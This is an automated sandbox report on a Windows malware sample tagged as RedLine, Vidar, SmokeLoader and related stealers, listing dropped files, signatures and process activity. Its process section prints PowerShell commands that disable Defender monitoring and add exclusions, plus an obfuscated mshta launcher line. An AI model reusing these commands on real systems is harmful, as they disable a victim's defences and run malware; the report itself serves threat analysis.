Malware Analysis Report

2025-08-10 17:09

Sample ID 211119-ws68maeca2
Target ab0bd8932a92421272b5911e2ebf488b.exe
SHA256 61299f208e35ed6fa26b16639ff495d378f64f9486a70c29eae80592d930e791
Tags
redline smokeloader socelars vidar 933 media151 aspackv2 backdoor infostealer spyware stealer trojan amadey
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

61299f208e35ed6fa26b16639ff495d378f64f9486a70c29eae80592d930e791

Threat Level: Known bad

The file ab0bd8932a92421272b5911e2ebf488b.exe was found to be: Known bad.

Malicious Activity Summary

redline smokeloader socelars vidar 933 media151 aspackv2 backdoor infostealer spyware stealer trojan amadey

Socelars

SmokeLoader

Socelars Payload

RedLine

Process spawned unexpected child process

Amadey

Vidar

RedLine Payload

Vidar Stealer

Executes dropped EXE

Downloads MZ/PE file

ASPack v2.12-2.42

Reads user/profile data of web browsers

Loads dropped DLL

Looks up external IP address via web service

Legitimate hosting services abused for malware hosting/C2

Looks up geolocation information via web service

Suspicious use of SetThreadContext

Program crash

Enumerates physical storage devices

Creates scheduled task(s)

Suspicious behavior: MapViewOfSection

Kills process with taskkill

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Checks SCSI registry key(s)

Suspicious use of AdjustPrivilegeToken

Suspicious use of FindShellTrayWindow

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2021-11-19 18:12

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2021-11-19 18:12

Reported

2021-11-19 18:14

Platform

win7-en-20211104

Max time kernel

39s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\ab0bd8932a92421272b5911e2ebf488b.exe"

Signatures

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\rundll32.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\rundll32.exe

RedLine

infostealer redline

RedLine Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

Socelars

stealer socelars

Socelars Payload

Description Indicator Process Target
N/A N/A N/A N/A

Vidar

stealer vidar

Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon135d1cd0566c227c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon133b4073df5e3f72.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13459b4085.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon1348816450.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13136643d24e51.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13073304e5395.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13470f9aa951f871.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon134ab4d3e88a4d3e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13470f9aa951f871.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13bb1ac8986b773.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-G9424.tmp\Mon13073304e5395.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13be6b39578.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13073304e5395.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-4OFVO.tmp\Mon13073304e5395.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13bb1ac8986b773.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3SEL8GaJ5WrN1.EXe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13bb1ac8986b773.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\ab0bd8932a92421272b5911e2ebf488b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon133b4073df5e3f72.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon133b4073df5e3f72.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13459b4085.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13459b4085.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13136643d24e51.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13136643d24e51.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13073304e5395.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13073304e5395.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13470f9aa951f871.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13470f9aa951f871.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13470f9aa951f871.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon134ab4d3e88a4d3e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon134ab4d3e88a4d3e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13470f9aa951f871.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13470f9aa951f871.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13bb1ac8986b773.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13bb1ac8986b773.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13073304e5395.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-G9424.tmp\Mon13073304e5395.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-G9424.tmp\Mon13073304e5395.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-G9424.tmp\Mon13073304e5395.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-G9424.tmp\Mon13073304e5395.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13be6b39578.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13be6b39578.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13073304e5395.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13073304e5395.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13073304e5395.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-4OFVO.tmp\Mon13073304e5395.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-4OFVO.tmp\Mon13073304e5395.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-4OFVO.tmp\Mon13073304e5395.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13bb1ac8986b773.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13bb1ac8986b773.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A

Reads user/profile data of web browsers

spyware stealer

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon134ab4d3e88a4d3e.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon134ab4d3e88a4d3e.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon134ab4d3e88a4d3e.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13be6b39578.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon134ab4d3e88a4d3e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon134ab4d3e88a4d3e.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon134ab4d3e88a4d3e.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13459b4085.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WerFault.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 684 wrote to memory of 364 N/A C:\Users\Admin\AppData\Local\Temp\ab0bd8932a92421272b5911e2ebf488b.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 684 wrote to memory of 364 N/A C:\Users\Admin\AppData\Local\Temp\ab0bd8932a92421272b5911e2ebf488b.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 684 wrote to memory of 364 N/A C:\Users\Admin\AppData\Local\Temp\ab0bd8932a92421272b5911e2ebf488b.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 684 wrote to memory of 364 N/A C:\Users\Admin\AppData\Local\Temp\ab0bd8932a92421272b5911e2ebf488b.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 684 wrote to memory of 364 N/A C:\Users\Admin\AppData\Local\Temp\ab0bd8932a92421272b5911e2ebf488b.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 684 wrote to memory of 364 N/A C:\Users\Admin\AppData\Local\Temp\ab0bd8932a92421272b5911e2ebf488b.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 684 wrote to memory of 364 N/A C:\Users\Admin\AppData\Local\Temp\ab0bd8932a92421272b5911e2ebf488b.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 364 wrote to memory of 924 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe
PID 364 wrote to memory of 924 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe
PID 364 wrote to memory of 924 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe
PID 364 wrote to memory of 924 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe
PID 364 wrote to memory of 924 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe
PID 364 wrote to memory of 924 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe
PID 364 wrote to memory of 924 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe
PID 924 wrote to memory of 1292 N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 924 wrote to memory of 1292 N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 924 wrote to memory of 1292 N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 924 wrote to memory of 1292 N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 924 wrote to memory of 1292 N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 924 wrote to memory of 1292 N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 924 wrote to memory of 1292 N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 924 wrote to memory of 1256 N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 924 wrote to memory of 1256 N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 924 wrote to memory of 1256 N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 924 wrote to memory of 1256 N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 924 wrote to memory of 1256 N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 924 wrote to memory of 1256 N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 924 wrote to memory of 1256 N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 924 wrote to memory of 1376 N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 924 wrote to memory of 1376 N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 924 wrote to memory of 1376 N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 924 wrote to memory of 1376 N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 924 wrote to memory of 1376 N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 924 wrote to memory of 1376 N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 924 wrote to memory of 1376 N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 924 wrote to memory of 976 N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 924 wrote to memory of 976 N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 924 wrote to memory of 976 N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 924 wrote to memory of 976 N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 924 wrote to memory of 976 N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 924 wrote to memory of 976 N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 924 wrote to memory of 976 N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 924 wrote to memory of 1864 N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 924 wrote to memory of 1864 N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 924 wrote to memory of 1864 N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 924 wrote to memory of 1864 N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 924 wrote to memory of 1864 N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 924 wrote to memory of 1864 N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 924 wrote to memory of 1864 N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 924 wrote to memory of 1740 N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 924 wrote to memory of 1740 N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 924 wrote to memory of 1740 N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 924 wrote to memory of 1740 N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 924 wrote to memory of 1740 N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 924 wrote to memory of 1740 N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 924 wrote to memory of 1740 N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 924 wrote to memory of 1752 N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 924 wrote to memory of 1752 N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 924 wrote to memory of 1752 N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 924 wrote to memory of 1752 N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 924 wrote to memory of 1752 N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 924 wrote to memory of 1752 N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 924 wrote to memory of 1752 N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 924 wrote to memory of 1012 N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe C:\Windows\SysWOW64\cmd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\ab0bd8932a92421272b5911e2ebf488b.exe

"C:\Users\Admin\AppData\Local\Temp\ab0bd8932a92421272b5911e2ebf488b.exe"

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Mon135d1cd0566c227c.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Mon133b4073df5e3f72.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Mon13d453d994180b.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Mon1348816450.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Mon13459b4085.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Mon13136643d24e51.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Mon13073304e5395.exe

C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon135d1cd0566c227c.exe

Mon135d1cd0566c227c.exe

C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon133b4073df5e3f72.exe

Mon133b4073df5e3f72.exe

C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13459b4085.exe

Mon13459b4085.exe

C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon1348816450.exe

Mon1348816450.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Mon13a2838ed1d8384.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Mon134ab4d3e88a4d3e.exe

C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13136643d24e51.exe

Mon13136643d24e51.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Mon13470f9aa951f871.exe /mixtwo

C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13073304e5395.exe

Mon13073304e5395.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Mon13be6b39578.exe

C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon134ab4d3e88a4d3e.exe

Mon134ab4d3e88a4d3e.exe

C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13470f9aa951f871.exe

Mon13470f9aa951f871.exe /mixtwo

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Mon13bb1ac8986b773.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Mon13248c3d7ea8c81.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13470f9aa951f871.exe

Mon13470f9aa951f871.exe /mixtwo

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VbScriPt: CLOSE ( cReatEObjECT ( "WscripT.SHell").run ( "C:\Windows\system32\cmd.exe /Q /C tyPe ""C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon133b4073df5e3f72.exe"" > 3SEL8GaJ5WrN1.EXe && StaRt 3SEL8GaJ5wRN1.EXe /PH_7h_09F5OVN3UJ0hRF1x0tV8JPL9& iF """" =="""" for %Z IN ( ""C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon133b4073df5e3f72.exe"") do taskkill /f -im ""%~nXZ"" " , 0 , TRUE ) )

C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13bb1ac8986b773.exe

Mon13bb1ac8986b773.exe

C:\Users\Admin\AppData\Local\Temp\is-G9424.tmp\Mon13073304e5395.tmp

"C:\Users\Admin\AppData\Local\Temp\is-G9424.tmp\Mon13073304e5395.tmp" /SL5="$10186,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13073304e5395.exe"

